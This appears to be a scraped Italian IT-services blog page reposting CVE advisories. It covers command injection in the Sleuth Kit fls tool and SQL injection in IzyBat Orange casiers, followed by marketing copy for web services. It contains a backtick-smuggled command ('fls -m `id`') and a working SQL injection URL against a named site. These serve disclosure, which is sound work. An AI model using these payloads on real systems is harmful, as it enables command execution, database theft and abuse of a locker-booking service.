fls tool is affected by command injection in parameter "-m" when run on linux system.  
OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands  
via a crafted value to the m parameter

when it run on linux, a user can insert in the -m parameter a buffer with backtick with a shell command.  
If it run with a web application as front end it can execute commands on the remote server.

The function affected by the vulnerability is "tsk\_fs\_fls()" from the "fls\_lib.c" file

#ifdef TSK\_WIN32  
   {  
   ....  
   }  
#else

   data.macpre = tpre; <---------------

   return tsk\_fs\_dir\_walk(fs, inode, flags, print\_dent\_act, &data);

#endif

Run command:

$ fls -m \`id\` \[Options\]

CVE-2022-45639: Binary World - Informazioni,Sicurezza informatica,Sorgenti e tanto altro...

IzyBat Orange casiers before 20221102_1 allows SQL Injection via a getCasier.php?taille= URI.

**Overview**

An authenticated remote attacker can perform a time based SQLi injection in Orange casiers database.  
Note: everyone can sign up to have a user account.

**Impact**

Informaction disclosure

**Details**

A time based SQLi has been detected on http://orange-casiers.fr/getCasier.php?taille=b via the “taille” parameter.  
The SQLi allowed us to dump the database containing: First name, family name, password’s hashes, badge serial numbers …

**Not affected version**

20221102\_1

**Proof of Concept**

You need to select a locker block that manage choosing a top or bottom locker.  
When ask if you prefer a top or bottom locker, visit the URL http://orange-casiers.fr/getCasier.php?taille=1’+OR’1’%3D’1 instead to get the first locker available regardless of its physical location.  
Revisiting the URL allow a user to get another locker, regardless of the limitation usually in place of 1 locker/person. In fact, you could reserve every single lockers available.

**Solution****Security patch**

Upgrade to 20221102\_1

**References****Credits**

Orange CERT-CC  
Hugo VOVARD at Orange group

**Timeline**

**Date reported:** November 2, 2022  
**Date fixed:** November 2, 2022

CVE-2023-22630: IzyBat Orange casiers - SQLi injection

A vulnerability in the descarga_etiqueta.php component of Correos Prestashop 1.7.x allows attackers to execute a directory traversal.

 Servizi informatici a Valencia.

*   Servizio Web a Valencia. Sviluppiamo una potente strateggia Seo in Google, che garantizza eccelenti risultati ai nostri clienti.
*   Assistenza Informatica.  
    Ci incarichiamo di tutta l´assistenza informatica della tua impresa.
*   Sviluppo e disegno di pagine Web. Posizionamento Web.  Ottimizzazione siti per i motori di ricerca.

 Tutti gli strumenti Web,

*   Hosting
*   Domini
*   Email
*   e-Commerce
*   Siti Web
*   Web Marketing SEO e SEM

per essere presenti in Internet.

 Siamo professionisti in,

*    Sviluppo Web
*   Amministrazione Server
*   Consulenza IT
*   Sicurezza Informatica
*   LOPD Protezione dei Dati
*    Integrazione di Sistemi Informatici

Tag

#php